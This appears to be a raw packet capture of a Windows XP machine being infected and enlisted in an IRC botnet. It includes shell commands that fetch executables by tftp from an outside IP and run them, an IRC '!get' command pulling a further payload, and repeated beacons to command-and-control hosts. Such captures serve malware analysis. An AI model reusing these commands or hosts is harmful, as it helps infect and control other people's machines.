VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32>
VICTIM: tftp -i 175.124.143.165 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\030
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: Transfer successful: 64272 bytes in 27 seconds, 2380 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 175.124.143.165 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\031
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 9 seconds, 2218 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK ystoutqyUSER j020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG ystoutqy :!get http:/yigeshabi.8800.org:2012/kp.exe
VICTIM: GET /kp.exe HTTP/1.0User-Agent: DownloadHost: yigeshabi.8800.org:2012Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2469F7DCEACA9F5FE9F6DDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=3.406924E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /myck.jpg?t=0.5312616 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: russia.9966.org:2011Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=B7A9DF3BB020D3775EB3D0E16E2B22D10F94224786A2EF23AACC87C2F55D0F53423B16F17E400A26CFF23953FDED1EF423E9C62FF75587A220156CC475D9FE90275851F81316801FD3E9F98354BA508FE81F6A5738463F3986248EE311E42B50A3F6D8C692B8C659B7042AAD29299802B94EF7D88EC947604B12A4CB9C2A17A9313535916151AD6F083A257D71B7189B&t=0.1104853 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=9B85638757C705A10BE6B584B6F32BD8148F711444607BB77117ADE8CC64673B601908EF88B6103C0E33462C372709E3509A3AD370D25E7B93A6E941369AD5BB1669EC45CCC973EC566C166CCB25429DCA3D576A710F5254D173E08D3CC9FE85E9BC8896B89270EF21926FF9956C67EFD124E1BFFCAF380A889C7D08238113E94656963C2013884FECD9D989FA324AC8F012&t=0.1309931 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /ck3.jpg?t=0.5351068 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: russia.9966.org:2011Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=F6E8618520B08F1031DDAE827E35E8570D93A69F34112FB83F0D387D45EBE9B38BF22A302C6C3404E482B1DC211BFC11D5193F8999F6725A1F2B9CE40C8CBAD1A3DC3844FA35E47B83B9BFC530DE1EC18572EFD24739282EB81AA6CB6F9A0873590C405E6A40FE61F7441F98DBDBBA20D6218BA4C186CDEA91C8BDD23F895EE00401369C9EAC1EDB6953550294507D01&t=0.1201898 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=FEE0D632D949DD429C702C0083C81DA261FF8DB493B68F186456C08587294B11A7DED0CA0E4ED2E2F99F5F32102A00ED1AD63D8BEE813C14211539410B8BF2991B6438448B4443DCF5CF84FE5BB5FB249B6C665B710FC3C562C0F69B55A097ECA3F6322CE0CA7BE4A91A4ED843BA6AE2CE3B4B154C1F90A2E0F4CBBEE547B842CADA2482DDEB08CF7042B3E3EC2CEC92DA06&t=0.5199091 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck3.nucleardiscover.com:88
ATTACKER: GET /ck4.jpg?t=0.6370203 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: russia.9966.org:2011Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck3.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck3.nucleardiscover.com:88
ATTACKER: GET /sn.php?c=859BA84C9909AD0EEE02250F3F49A260925FE88C27779409016714567AD0560CCA85CBDC6323B89390AAF09EC3C865726199328925490C5F4475463FF474BED2116F73D7EBEF970886BC542ECE20A17E9661DAE75826F5F304A690FD7481245F3164233DAF85D54A328121A6EEEEAF3526D1012E5C1B795EC79E640BA7117FC13E3A9A366C5F38FE3C0A6838EF2D27A4&t=0.6687738 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=445ADF3B3AAA17B4628ECDE7DBAD31F35D90432782D263FE92F47C3E8D2762387837647347071B30D4EEFD93BDB63D2A2CD401BACDA1F7A47D4CC8B17FFF036F304E6DC9989CE37C4B712C566D836BB4E5120F32F6887F79DC7ECAA723D61E65CA9FE3FD73599F0034871680C23B3BB305F0F7A96231CCFE3B2FD9AC6ECCD42EE1F1EF495B69C1043D08B1E6D01570F04AA9&t=3.795803E-03 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck4.nucleardiscover.com:88
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88
ATTACKER: GET /hn.gif?t=0.7525293 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: hn.yigeyuming.com:82Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=A3BD08ECAA3AC3123229A588377C348AD518197F0A5B6BF55D6F3B4CB01593BDD5AC40AA9DA6210F7144DB41C0CA1502C13BA91559287C2C2A4ACDB40F733AA697DAD7713DEB06996C56EB918E60B669BB4C1F22C9B7BDBBBB192449EE1BF2897623293781AB920DC172FC7B262689137186735C6E29EDCACC950A65F147CC723E3ACD679DAC27E34D78792C4D8A3EBF&t=0.785 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=948ADC38DA4A5283C2D9597490DBE85616DB5D3BC594C55B5260700774D1426C7B0256BCDDE6F1DFE9DCD943363C84939A60C8749EEFEBBBCBAB4039522EBD21CA872A8C23F5D946063C057F28C64D92689FE6DBB0CE7771E644BDD07A8F69125500D9C72903920D7ECDAF39F20B9B137580D78998CB90A2263257229A3840BA31212481AA9BE623F8CBE6B662A5098AF528&t=9.444827E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /gggg.exe?t=0.7264063 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 61.147.123.53:1056Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=FAE49F7BE575A67418E84F62F5B34FBFCE595E677D33E176E2D00347208A7D21C18A9089402C0D267D165C33212DD7CD12D400B74C3D5271EDC2C6BB324D3957AFE35E2A12C3DF402E14D3A91DF3C21DBC4BBE83D7A96264AC0EB9D4C035542F13461709341E920DCC7FD2559090158FBF48C5EA96D1A681623B1C7313A5F14F7F7A08ADBE8EDB1B3801B7E064A4156B&t=0.3929712 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache